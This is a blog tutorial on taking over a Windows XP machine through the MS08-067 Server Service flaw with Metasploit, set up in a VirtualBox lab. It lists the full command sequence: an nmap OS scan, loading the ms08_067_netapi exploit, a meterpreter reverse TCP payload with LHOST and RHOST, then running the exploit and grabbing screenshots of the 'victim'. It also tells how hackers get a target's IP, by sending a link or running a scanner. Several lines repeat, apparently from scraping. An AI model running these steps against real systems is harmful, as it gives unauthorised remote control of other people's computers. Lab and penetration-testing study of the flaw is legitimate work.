[Metaspl Tutorial] Hacking Windows XP using IP Address
Do you think it is possible to hack some one computer with just an ip address?! The answer is yes, if you are using unpatched(vulnerable) OS. If you don’t believe me, then read the full article.
In this article i am going to demonstrate how to hack a remote computer by exploiting the parsing flaw in the path canonicalization code of NetAPI32.dll through the Server Service(CVE-2008-4250). Before we jump into the actual exploitation process, let me give more details about this Server Service Vulnerability.
Exploiting the MS08-067 using Metasploit:
Requirements:
- VirtualBox
- Backtrack 5
- Target OS(XP)
Step 1:
Create Two Virtual Machine(VM) namely “Target” and “BT5″. Install the XP inside Target VM and Backtrack inside BT5. Start the Two VMs.
If you don’t know how to create virtual machines , then please read this VirtualBox Manual.
Step 2: Find the IP address of Target
Open The command prompt in the Target machine(XP). Type “ipconfig” to find the IP address of the Target system.
Open The command prompt in the Target machine(XP). Type “ipconfig” to find the IP address of the Target system.
Hackers use different method for finding the ip address of victim. For Eg., By sending link that will get the ip details or use Angry IP Scanner.
Step 3: Information Gathering
Now let us collect some information about the Target machine. For this purpose , we are going to use the nmap tool.
Now let us collect some information about the Target machine. For this purpose , we are going to use the nmap tool.
Open The Terminal in the BT5 machine(Backtrack) and type “nmap -O 192.168.56.12“. Here 192.168.56.12 is IP address of Target machine. If you look at the result, you can find the list of open ports and OS version.
Step 4: Metasploit
Now open the Terminal in the BT5 machine(Backtrack) and Type “msfconsole“.
Now open the Terminal in the BT5 machine(Backtrack) and Type “msfconsole“.
The msfconsole is the most popular interface to the Metasploit Framework. It provides an “all-in-one” centralized console and allows you efficient access to virtually all of the options available in the Metasploit Framework.
Let us use the Search command to find the exploit modules with keyword netapi. Type “search netapi”. Now you can see the list of modules match with the netapi.
We are going to exploit MS08-067 , so type “use exploit/windows/smb/ms08_067_netapi“.
Step 5: Set Payload
As usual, let the Reverse Tcp Payload for this exploit. Type “set payload windows/meterpreter/reverse_tcp” in the msfconsole.
As usual, let the Reverse Tcp Payload for this exploit. Type “set payload windows/meterpreter/reverse_tcp” in the msfconsole.
Step 6: Options
Type “set LHOST 192.168.56.10“. Here 192.168.56.10 is IP address of Backtrack machine. You can find the ip address by typing ‘ifconfig’ command in the Terminal.
Type “set LHOST 192.168.56.10“. Here 192.168.56.10 is IP address of Backtrack machine. You can find the ip address by typing ‘ifconfig’ command in the Terminal.
Type “set RHOST 192.168.56.12“. Here 192.168.56.12 is IP address of Target machine.
Step 7: Exploiting
Ok, it is time to exploit the vulnerability, type “exploit” in the console. If the exploit is successfull,
Ok, it is time to exploit the vulnerability, type “exploit” in the console. If the exploit is successfull,
Now we control the remote computer using the meterpreter. For example, typing “screenshot” will grab the screenshot of the victim system.
No comments:
Post a Comment